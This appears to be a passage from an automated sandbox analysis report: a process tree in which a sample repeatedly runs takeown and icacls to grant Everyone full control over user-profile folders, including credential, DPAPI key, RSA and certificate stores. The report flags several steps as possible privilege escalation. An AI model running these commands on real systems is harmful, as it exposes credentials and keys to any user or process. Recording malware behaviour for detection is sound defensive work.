C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6 /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\603⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\613⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\623⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\633⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\73⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7 /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\83⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\93⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9 /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\security && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\security /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\security3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\security /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x643⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming && icacls C:\Users\Admin\AppData\Roaming /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe && icacls C:\Users\Admin\AppData\Roaming\Adobe /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Adobe /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat && icacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0 && icacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.03⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\Collab && icacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\Collab /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\Collab3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\Collab /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player && icacls C:\Users\Admin\AppData\Roaming\Adobe\Flash Player /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache && icacls C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache\UNJKZEGJ && icacls C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache\UNJKZEGJ /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache\UNJKZEGJ3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\NativeCache && icacls C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\NativeCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\NativeCache3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Identities && icacls C:\Users\Admin\AppData\Roaming\Identities /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Identities3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Identities /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Identities\{DC1210CF-B63A-446E-AF3A-F1B1B9A04067} && icacls C:\Users\Admin\AppData\Roaming\Identities\{DC1210CF-B63A-446E-AF3A-F1B1B9A04067} /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Identities\{DC1210CF-B63A-446E-AF3A-F1B1B9A04067}3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Identities\{DC1210CF-B63A-446E-AF3A-F1B1B9A04067} /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia && icacls C:\Users\Admin\AppData\Roaming\Macromedia /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Macromedia /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\4G6TSLRD && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\4G6TSLRD /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\4G6TSLRD3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Media Center Programs && icacls C:\Users\Admin\AppData\Roaming\Media Center Programs /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Media Center Programs3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft && icacls C:\Users\Admin\AppData\Roaming\Microsoft /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\AddIns && icacls C:\Users\Admin\AppData\Roaming\Microsoft\AddIns /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\AddIns3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\AddIns /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Credentials && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Credentials /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Credentials3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Credentials /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3434294380-2554721341-1919518612-1000 && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3434294380-2554721341-1919518612-1000 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3434294380-2554721341-1919518612-10003⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3434294380-2554721341-1919518612-1000 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033 && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\10333⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14 && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\143⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Excel && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Excel /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Excel3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Excel /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Office && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Office /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Office3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Office /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Proof && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Proof /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Proof3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Proof /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Protect && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Protect /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Protect3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Protect /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-3434294380-2554721341-1919518612-1000 && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-3434294380-2554721341-1919518612-1000 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-3434294380-2554721341-1919518612-10003⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-3434294380-2554721341-1919518612-1000 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates && icacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My && icacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates && icacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs && icacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs && icacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Templates && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Templates /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Templates3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Templates /grant everyone:(f)3⤵
-
-
-
